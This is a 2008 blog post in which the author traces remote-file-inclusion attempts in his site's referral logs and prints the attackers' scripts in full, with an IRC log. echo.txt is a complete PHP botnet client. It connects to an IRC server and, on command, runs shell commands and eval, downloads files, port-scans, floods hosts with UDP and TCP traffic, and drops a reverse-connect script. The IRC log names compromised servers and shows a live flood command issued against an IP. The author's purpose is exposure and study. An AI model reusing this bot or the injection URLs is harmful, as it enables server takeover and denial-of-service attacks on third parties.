mario a. spinthiras

This afternoon I was checking the referrals to this site and I stumbled across something odd. Naturally as a tech-curious person that I am I dug further to exploring the strange URL that referred to my site. Unbelievably enough I found something hilariously serious.This is how I found the script kiddies and it was quite funny.

If the script kiddies are looking at this , don’t be alarmed , I didn’t tell your parents how silly you can get sometimes. Your only children and I forgive you. Just remember , in some countries you will get the chance to feel the cold steel that makes up a jail bar. If any law enforcement agencies are looking at this , first off know that I have nothing to do with this childish stupid behavior and your welcome by finding information on this blog that will help investigate on the idiot that started this thing. Also know that you can’t stop all of them due to the vast amount of immaturity that the world is drowning in.

Now back to the story. When I checked my referrals I saw this:

84.16.230.73 2008-07-08 17:47:59 /?include_path=http://www.diving-thailand-phuket.com/echo.txt?? unknown Windows 95 Internet Explorer 2.0 GERMANY Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)

And another one the same but with this URL:

/?include_path=http://5score.org/calendar/info/test.txt???

I laughed when I saw it. I was also alarmed though because I updated WP recently and wondered if it where a recent security vulnerability that I was not aware of. Never the less the curious Mario kicked in. Before that I called up my hosting provider’s IT dept (which the CTO is my very good friend) to check for anything odd since I do not have direct access to the machine that this site is hosted on. There were no signs of intrusion so I went back to the fun part right away.

I visited the URLs mentioned in the string from the attempt to exploit the server and I found two php scripts.

echo.txt seemed to be an IRC attack bot written in PHP that does the following:

* Sets the PHP execution time to 0 which means maximum execution time.
* Joins an IRC server , specifically irc.oltreirc.net.
* Joins the following channels: ##cinestar , ##scream
* Sets a random nickname with the [A]k0d prefix followed by 4 random letters.
* Announce the hack including a full `uname -a`
* Await for further instructions

This PHP bot seems to be written by some guy that goes by the alias of devil__ (or something like that). I found a mentioning of an “xdevil.org” in a comment in the code. It seems like just another script kiddie though I could be wrong and this concluded by visiting http://www.xdevil.org/ . Never the less echo.txt is available to you below for examination:

<?

set_time_limit(0);
error_reporting(0);
echo “h4ck3d”;

class pBot
{
var $config = array(”server”=>”irc.oltreirc.net”,
“port”=>”6667″,
“pass”=>”",
“prefix”=>”k0d”,
“maxrand”=>”4″,
“chan”=>”##cinestar”,
“chan2″=>”##scream”,
“key”=>”123457″,
“modes”=>”+p”,
“password”=>”plz”,
“trigger”=>”.”,
“hostauth”=>”*” // * for any hostname (remember: /setvhost xdevil.org)
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = $this->config['prefix'];
$alph = range(”0″,”9″);
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,9)];
if(strlen($this->config['pass'])>0)
$this->send(”PASS “.$this->config['pass']);
$this->send(”USER “.$ident.” 127.0.0.1 localhost :”.php_uname().”");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(” “,$this->buf);
if(substr($this->buf,0,6)==”PING :”)
{
$this->send(”PONG :”.substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] ==”001″)
{
$this->send(”MODE “.$this->nick.” “.$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan2'],”[\2uname!\2]: $uname (safe: $safemode)”);
$this->privmsg($this->config['chan2'],”[\2vuln!\2]: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”");
}
if(isset($cmd[1]) && $cmd[1]==”433″)
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf,” :”),2);
$msgcmd = explode(” “,$msg);
$nick = explode(”!”,$cmd[0]);
$vhost = explode(”@”,$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case “QUIT”:
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case “PART”:
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case “PRIVMSG”:
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == “*”))
{
if(substr($mcmd[0],0,1)==”.”)
{
switch(substr($mcmd[0],1))
{
case “user”:
if($mcmd[1]==$this->config['password'])
{
$this->log_in($host);
}
else
{
$this->notice($this->config['chan'],”[\2Auth\2]: Senha errada $nick idiota!!”);
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==”.”)
{
switch(substr($mcmd[0],1))
{
case “restart”:
$this->send(”QUIT :restart commando from $nick”);
fclose($this->conn);
$this->start();
break;
case “mail”: //mail to from subject message
if(count($mcmd)>4)
{
$header = “From: <”.$mcmd[2].”>”;
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],”[\2mail\2]: Impossivel mandar e-mail.”);
}
else
{
$this->privmsg($this->config['chan'],”[\2mail\2]: Mensagem enviada para \2″.$mcmd[1].”\2″);
}
}
break;
case “safe”:
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”)
{
$safemode = “on”;
}
else {
$safemode = “off”;
}
$this->privmsg($this->config['chan'],”[\2safe mode\2]: “.$safemode.”");
break;
case “inbox”: //teste inbox
if(isset($mcmd[1]))
{
$token = md5(uniqid(rand(), true));
$header = “From: <inbox”.$token.”@X-Ide.com>”;
$a = php_uname();
$b = getenv(”SERVER_SOFTWARE”);
$c = gethostbyname($_SERVER["HTTP_HOST"]);
if(!mail($mcmd[1],”InBox Test”,”#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”\n\ngreetz: wicked\nby: dvl <marcsown@hotmail.com>”,$header))
{
$this->privmsg($this->config['chan'],”[\2inbox\2]: Unable to send”);
}
else
{
$this->privmsg($this->config['chan'],”[\2inbox\2]: Message sent to \2″.$mcmd[1].”\2″);
}
}
break;
case “conback”:
if(count($mcmd)>2)
{
$this->conback($mcmd[1],$mcmd[2]);
}
break;
case “dns”:
if(isset($mcmd[1]))
{
$ip = explode(”.”,$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],”[\2dns\2]: “.$mcmd[1].” => “.gethostbyname($mcmd[1]));
}
}
break;
case “info”:
case “vunl”:
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan'],”[\2info\2]: $uname (safe: $safemode)”);
$this->privmsg($this->config['chan'],”[\2vuln\2]: http://”.$_SERVER['SERVER_NAME'].”".$_SERVER['REQUEST_URI'].”");
break;
case “bot”:
$this->privmsg($this->config['chan'],”[\2bot\2]: phpbot 2.0 by; #crew@corp.”);
break;
case “uname”:
if (@ini_get(”safe_mode”) or strtolower(@ini_get(”safe_mode”)) == “on”) { $safemode = “on”; }
else { $safemode = “off”; }
$uname = php_uname();
$this->privmsg($this->config['chan'],”[\2info\2]: $uname (safe: $safemode)”);
break;
case “rndnick”:
$this->set_nick();
break;
case “raw”:
$this->send(strstr($msg,$mcmd[1]));
break;
case “eval”:
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case “sexec”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],”      : “.trim($ret[$i]));
break;

case “exec”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = exec($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],”      : “.trim($ret[$i]));
break;

case “passthru”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = passthru($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],”      : “.trim($ret[$i]));
break;

case “popen”:
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],”[\2popen\2]: $command”);
$pipe = popen($command,”r”);
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan'],”     : $pbuf”);
}
pclose($pipe);
}

case “system”:
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = system($command);
$ret = explode(”\n”,$exec);
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan'],”      : “.trim($ret[$i]));
break;

case “pscan”: // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2open\2″);
else
$this->privmsg($this->config['chan'],”[\2pscan\2]: “.$mcmd[1].”:”.$mcmd[2].” is \2closed\2″);
}
break;
case “ud.server”: // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],”[\2update\2]: Server trocado para “.$mcmd[1].”:”.$mcmd[2].” Senha: “.$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],”[\2update\2]: Server trocado para “.$mcmd[1].”:”.$mcmd[2]);
}
}
break;
case “download”:
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],”w”))
{
$this->privmsg($this->config['chan'],”[\2download\2]: Nao foi possivel fazer o download. Permissao negada.”);
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],”[\2download\2]: Nao foi possivel fazer o download de \2″.$mcmd[1].”\2″);
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],”[\2download\2]: Arquivo \2″.$mcmd[1].”\2 baixado para \2″.$mcmd[2].”\2″);
}
fclose($fp);
}
}
else { $this->privmsg($this->config['chan'],”[\2download\2]: use .download http://your.host/file /tmp/file”); }
break;
case “die”:
$this->send(”QUIT :die command from $nick”);
fclose($this->conn);
exit;
case “logout”:
$this->log_out($host);
$this->privmsg($this->config['chan'],”[\2auth\2]: $nick deslogado!”);
break;
case “udpflood”:
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case “tcpflood”:
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,”$msg\r\n”);

}
function join($chan,$key=NULL)
{
$this->send(”JOIN $chan $key”);
}
function privmsg($to,$msg)
{
$this->send(”PRIVMSG $to :$msg”);
}
function notice($to,$msg)
{
$this->send(”NOTICE $to :$msg”);
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”apache”))
$this->nick = “[A]“;
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”iis”))
$this->nick = “[I]“;
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),”xitami”))
$this->nick = “[X]“;
else
$this->nick = “[U]“;
}
else
{
$this->nick = “[C]“;
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send(”NICK “.$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],”[\2UdpFlood Started!\2]“);
$packet = “”;
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen(”udp://”.$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],”[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s “);
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],”[\2TcpFlood Started!\2]“);
$packet = “”;
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen(”tcp://”.$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],”[\2TcpFlood\2]: Error: <$e>”);
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],”[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.”);
}
function conback($ip,$port)
{
$this->privmsg($this->config['chan'],”[\2conback\2]: tentando conectando a $ip:$port”); $dc_source = “”;
if (is_writable(”/tmp”))
{
if (file_exists(”/tmp/dc.pl”)) { unlink(”/tmp/dc.pl”); }
$fp=fopen(”/tmp/dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(”perl /tmp/dc.pl $ip $port &”);
unlink(”/tmp/dc.pl”);
}
else
{
if (is_writable(”/var/tmp”))
{
if (file_exists(”/var/tmp/dc.pl”)) { unlink(”/var/tmp/dc.pl”); }
$fp=fopen(”/var/tmp/dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(”perl /var/tmp/dc.pl $ip $port &”);
unlink(”/var/tmp/dc.pl”);
}
if (is_writable(”.”))
{
if (file_exists(”dc.pl”)) { unlink(”dc.pl”); }
$fp=fopen(”dc.pl”,”w”);
fwrite($fp,base64_decode($dc_source));
passthru(”perl dc.pl $ip $port &”);
unlink(”dc.pl”);
}
}
}
}

$bot = new pBot;
$bot->start();

?>

test.txt seems to be the rest of the script which do other functions. See below:

<html><head><title>/\/\/\ Response CMD /\/\/\</title></head><body bgcolor=DC143C>
<H1>Changing this CMD will result in corrupt scanning !</H1>
</html></head></body>
<?php
if((@eregi(”uid”,ex(”id”))) || (@eregi(”Windows”,ex(”net start”)))){
echo(”Safe Mode of this Server is : “);
echo(”SafemodeOFF”);
}
else{
ini_restore(”safe_mode”);
ini_restore(”open_basedir”);
if((@eregi(”uid”,ex(”id”))) || (@eregi(”Windows”,ex(”net start”)))){
echo(”Safe Mode of this Server is : “);
echo(”SafemodeOFF”);
}else{
echo(”Safe Mode of this Server is : “);
echo(”SafemodeON”);
}
}
function ex($cfe){
$res = ”;
if (!empty($cfe)){
if(function_exists(’exec’)){
@exec($cfe,$res);
$res = join(”\n”,$res);
}
elseif(function_exists(’shell_exec’)){
$res = @shell_exec($cfe);
}
elseif(function_exists(’system’)){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists(’passthru’)){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,”r”))){
$res = “”;
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}

exit;

Let’s pay attention to the important part that makes things so interesting from echo.txt.

var $config = array(”server”=>”irc.oltreirc.net”,
“port”=>”6667″,
“pass”=>”",
“prefix”=>”k0d”,
“maxrand”=>”4″,
“chan”=>”##cinestar”,
“chan2″=>”##scream”,
“key”=>”123457″,
“modes”=>”+p”,
“password”=>”plz”,
“trigger”=>”.”,
“hostauth”=>”*” // * for any hostname (remember: /setvhost xdevil.org)

Just looking at it was a laugh. After going through the script quickly realized how bot nickname’s are set from the script and opened up xchat to pretend to be a bot. Joining the IRC server I immediately joined the channels mentioned in the array. Please see the chat log below for further clarification. To be able to follow the chat log , my nickname was “k0d1237″.

<k0d1237> lol
<[A]k0d5823> yep
<[A]k0d5823> lol would I say also <k0d1237> how pathetic does it get
<k0d1237> honestly
<[A]k0d5823> just finding out who is running this <k0d1237> echo.txt ? <k0d1237> oh
<k0d1237> you saw the logs too did you ?
<k0d1237> <[A]k0d5823> yep
<k0d1237> lol
<k0d1237> lets act like bots for a minute
<k0d1237> [A]k0d5823, .say LOL
<k0d1237> <[A]k0d5823> When you set your nick, like me
<[A]k0d5823> you can get also to ##cinestar
<k0d1237> im looking at their code
<[A]k0d5823> i did too
<k0d1237> irc on a php script , lol
<k0d1237> dont they know what firewalls are ?
<k0d1237> no outgoing connections for them <[A]k0d5823> but if you join on ##cinestart you can see all haxored servers
* Cannot join ##cinestar (Channel is invite only).
<[A]k0d1057> [uname!]: Linux plesk.globalnetworks.gr 2.4.21-37.ELsmp #1 SMP Wed Sep 7 13:28:55 EDT 2005 i686 (safe: on)
<[A]k0d1057> [vuln!]: http://www.dh-gaming.com//?include_path=http://www.diving-thailand-phuket.com/echo.txt??
<k0d1237> rg/calendar/info/test.txt???  unknown  Netscape Navigator 4.61 GERMANY  Mozilla/4.61 [en] (OS/2; U)
<k0d1237> 84.16.230.73  2008-07-08 17:47:59  /?include_path=http://www.divi
<k0d1237> ng-thailand-phuket.com/echo.tx
<k0d1237> t??
<k0d1237> it even identifies as mozilla * You are now known as [A]k0d3957
<[A]k0d8278> [uname!]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
<[A]k0d8278> [vuln!]: http://cyos.co.kr/bbs/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d8908> [uname!]: Linux ns91.badanet.co.kr 2.4.20-43.9.legacysmp #1 SMP Sat Apr 30 19:07:33 EDT 2005 i686 (safe: off)
<[A]k0d8908> [vuln!]: http://cyos.co.kr/bbs/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d3957> .quit
* [A]k0d5823 has quit (User has been permanently banned from OltreIrc ( unauthorized))
<[A]k0d5534> [uname!]: FreeBSD ns2.chmr.ru 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov  3 09:36:13 UTC 2005     root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
<[A]k0d5534> [vuln!]: http://www.chmr.ru//poll/booth.php?include_path=http://www.centrogassystem.com/frn/pf.txt???
<[A]k0d4001> [uname!]: FreeBSD server.brightlightmedia.co.uk 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Sun May  7 04:42:56 UTC 2006     root@opus.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP i386 (safe: off)
<[A]k0d4001> [vuln!]: http://www.nationalhotels.co.uk/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d8918> [uname!]: FreeBSD dl380.hppc.co.uk 6.0-RELEASE FreeBSD 6.0-RELEASE #0: Thu Nov  3 09:36:13 UTC 2005     root@x64.samsco.home:/usr/obj/usr/src/sys/GENERIC i386 (safe: off)
<[A]k0d8918> [vuln!]: http://www.hppc.co.uk/auction/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d7586> [uname!]: Linux iqnet.adverteaser.com 2.6.16-1.2111_FC4 #1 Sat May 20 19:59:40 EDT 2006 i686 (safe: off)
<[A]k0d7586> [vuln!]: http://www.iqnet-certification.com/index.php?page=http://www.diving-thailand-phuket.com/echo.txt??
<[A]k0d1789> [uname!]: Windows NT EVBBS 5.1 build 2600 (safe: off)
<[A]k0d1789> [vuln!]: http://bbs.ev.vnu.edu.tw/phpbb2/errors.php?error=http://www.diving-thailand-phuket.com/echo.txt??
* Now talking on ##cinestar
* [A]k0d8278 (~k0d1123@7F26F4C3.9717B992.2A42257.IP) has joined ##cinestar
* [A]k0d8908 (~k0d5189@7F26F4C3.9717B992.2A42257.IP) has joined ##cinestar
<[A]k0d3957> .quit
* ##cinestar :You need voice (+v) (##cinestar)
* [A]k0d7564 has quit (Ping timeout)
* Lilo (bluemoon@GlobalOp.OltreIrc.Net) has joined ##cinestar
* ChanServ sets mode +a ##cinestar Lilo
* ChanServ gives channel operator status to Lilo
* [A]k0d2697 has quit (Ping timeout)
* [A]k0d0700 has quit (Ping timeout)
* [A]k0d0666 has quit (Ping timeout)
* [A]k0d8617 has quit (Ping timeout)
* Azimuth (vsdfkvn@Iron.Steamer.never.Die) has joined ##cinestar
* ChanServ sets mode +a ##cinestar Azimuth
* ChanServ gives channel operator status to Azimuth
<Azimuth> uhm la & Pazzi di ##cinestar !!! non sapete in che guaio vi siete messi <-=®OscurO-script®=->
* Lilo (bluemoon@GlobalOp.OltreIrc.Net) has left ##cinestar
* [A]k0d5823 (~lare@A77B513A.7FF6ED4.F16AEF6D.IP) has left ##cinestar
<Azimuth> .user tic
-[A]k0d9931/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d9886/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0577/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d3702/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d3100/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4398/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d9618/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d1665/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7036/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d8826/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d2290/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0908/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7913/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4132/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4017/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d8421/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7027/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d8109/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d3180/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d7677/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4164/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d5556/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0825/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d9100/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d0920/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4804/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d4455/##cinestar- [Auth]: Senha errada Azimuth idiota!!
-[A]k0d5564/##cinestar- [Auth]: Senha errada Azimuth idiota!!
<Azimuth> .user plz
-[A]k0d4880/##cinestar- [Auth]: Senha errada Azimuth idiota!!
<Azimuth> .user net
<Azimuth> .udpflood 80.220.30.135 9000 120
<[A]k0d6308> [UdpFlood Started!]
<[A]k0d0908> [UdpFlood Started!]
<[A]k0d3100> [UdpFlood Started!]
<[A]k0d1665> [UdpFlood Started!]
<[A]k0d9886> [UdpFlood Started!]
<[A]k0d4132> [UdpFlood Started!]
<[A]k0d3702> [UdpFlood Started!]
<[A]k0d7121> [UdpFlood Started!]
<[A]k0d2290> [UdpFlood Started!]
<[A]k0d7036> [UdpFlood Started!]
<[A]k0d8826> [UdpFlood Started!]
<[A]k0d4398> [UdpFlood Started!]
<[A]k0d0577> [UdpFlood Started!]
<[A]k0d7913> [UdpFlood Started!]
<[A]k0d5371> [UdpFlood Started!]
<[A]k0d9931> [UdpFlood Started!]
<[A]k0d9618> [UdpFlood Started!]
<[A]k0d9824> [UdpFlood Started!]
<[A]k0d4017> [UdpFlood Started!]
<[A]k0d8109> [UdpFlood Started!]
<[A]k0d7027> [UdpFlood Started!]
<[A]k0d1153> [UdpFlood Started!]
<[A]k0d8421> [UdpFlood Started!]
<[A]k0d7677> [UdpFlood Started!]
<[A]k0d0401> [UdpFlood Started!]
<[A]k0d3180> [UdpFlood Started!]
<[A]k0d5556> [UdpFlood Started!]
<[A]k0d4455> [UdpFlood Started!]
<[A]k0d0920> [UdpFlood Started!]
<[A]k0d4804> [UdpFlood Started!]
<[A]k0d0825> [UdpFlood Started!]
<[A]k0d4164> [UdpFlood Started!]
<[A]k0d9100> [UdpFlood Started!]
<[A]k0d5564> [UdpFlood Started!]
<[A]k0d4880> [UdpFlood Started!]
<[A]k0d6126> [UdpFlood Started!]

I only beban logging half way though. The above is actually a buffer save from the active window (the channel). I added timestamps to aid anyone wanting time orientation.

Jul 08 20:04:26 *    [A]k0d4132 has quit (Connection reset by peer)
Jul 08 20:04:42 *    [A]k0d9824 has quit (Connection reset by peer)
Jul 08 20:04:53 *    [A]k0d4398 has quit (No route to host)
Jul 08 20:05:00 *    [A]k0d1665 has quit (Connection reset by peer)
Jul 08 20:05:12 *    Azimuth gives voice to [A]k0d0943 [A]k0d3957 [A]k0d5821 [A]k0d7746 [A]k0d8278 [A]k0d8908
Jul 08 20:05:22 <[A]k0d4017>    [UdpFlood Finished!]: 118 MB enviados / Media: 1 MB/s
Jul 08 20:05:22 <[A]k0d0825>    [UdpFlood Finished!]: 28976 MB enviados / Media: 241 MB/s
Jul 08 20:05:22 <[A]k0d8109>    [UdpFlood Finished!]: 6815 MB enviados / Media: 57 MB/s
Jul 08 20:05:22 <[A]k0d9886>    [UdpFlood Finished!]: 22819 MB enviados / Media: 190 MB/s
Jul 08 20:05:22 <[A]k0d9931>    [UdpFlood Finished!]: 18856 MB enviados / Media: 157 MB/s
Jul 08 20:05:22 <[A]k0d7027>    [UdpFlood Finished!]: 2167 MB enviados / Media: 18 MB/s
Jul 08 20:05:23 <[A]k0d5821>    [UdpFlood Finished!]: 2644 MB enviados / Media: 22 MB/s
Jul 08 20:05:23 <[A]k0d8826>    [UdpFlood Finished!]: 17208 MB enviados / Media: 143 MB/s
Jul 08 20:05:23 <[A]k0d7746>    [UdpFlood Finished!]: 6889 MB enviados / Media: 57 MB/s
Jul 08 20:05:23 <[A]k0d7677>    [UdpFlood Finished!]: 16404 MB enviados / Media: 137 MB/s
Jul 08 20:05:23 <[A]k0d4455>    [UdpFlood Finished!]: 11683 MB enviados / Media: 97 MB/s
Jul 08 20:05:23 <[A]k0d4804>    [UdpFlood Finished!]: 456 MB enviados / Media: 4 MB/s
Jul 08 20:05:23 <[A]k0d8908>    [UdpFlood Finished!]: 14373 MB enviados / Media: 120 MB/s
Jul 08 20:05:23 <[A]k0d8278>    [UdpFlood Finished!]: 14709 MB enviados / Media: 123 MB/s
Jul 08 20:05:23 <[A]k0d9618>    [UdpFlood Finished!]: 6313 MB enviados / Media: 53 MB/s
Jul 08 20:05:23 <[A]k0d0577>    [UdpFlood Finished!]: 41879 MB enviados / Media: 349 MB/s
Jul 08 20:05:23 <[A]k0d3702>    [UdpFlood Finished!]: 477 MB enviados / Media: 4 MB/s
Jul 08 20:05:23 <[A]k0d3180>    [UdpFlood Finished!]: 37874 MB enviados / Media: 316 MB/s
Jul 08 20:05:24 <[A]k0d5564>    [UdpFlood Finished!]: 279 MB enviados / Media: 2 MB/s
Jul 08 20:05:24 *    [A]k0d5534 (~k0d6528@995C4AF2.3E333E34.33EE78D3.IP) has joined ##cinestar
Jul 08 20:05:24 <[A]k0d0908>    [UdpFlood Finished!]: 19471 MB enviados / Media: 162 MB/s
Jul 08 20:05:25 <[A]k0d8421>    [UdpFlood Finished!]: 14271 MB enviados / Media: 119 MB/s
Jul 08 20:05:25 *    [A]k0d3100 has quit (Connection reset by peer)
Jul 08 20:05:25 *    [A]k0d4001 (~k0d9875@970AFCB4.2F45E854.E340ABB2.IP) has joined ##cinestar
Jul 08 20:05:26 <[A]k0d7913>    [UdpFlood Finished!]: 16570 MB enviados / Media: 138 MB/s
Jul 08 20:05:29 <[A]k0d0943>    [UdpFlood Finished!]: 8290 MB enviados / Media: 69 MB/s
Jul 08 20:05:31 <[A]k0d6126>    [UdpFlood Finished!]: 900 MB enviados / Media: 7 MB/s
Jul 08 20:05:40 *    [A]k0d8918 (~k0d0497@634CB9B7.EC4A613B.6711F1E0.IP) has joined ##cinestar
Jul 08 20:05:43 *    Azimuth gives voice to [A]k0d4001 [A]k0d5534
Jul 08 20:05:46 <[A]k0d4880>    [UdpFlood Finished!]: 15371 MB enviados / Media: 128 MB/s
Jul 08 20:05:50 <Azimuth>    .user tic
Jul 08 20:05:52 *    [A]k0d7586 (~k0d0520@73DB61AD.CA44201E.8406420.IP) has joined ##cinestar
Jul 08 20:06:04 <Azimuth>    .user tic
Jul 08 20:06:13 <Azimuth>    .raw join ##kbyte
Jul 08 20:06:23 *    [A]k0d7036 has quit (Ping timeout)
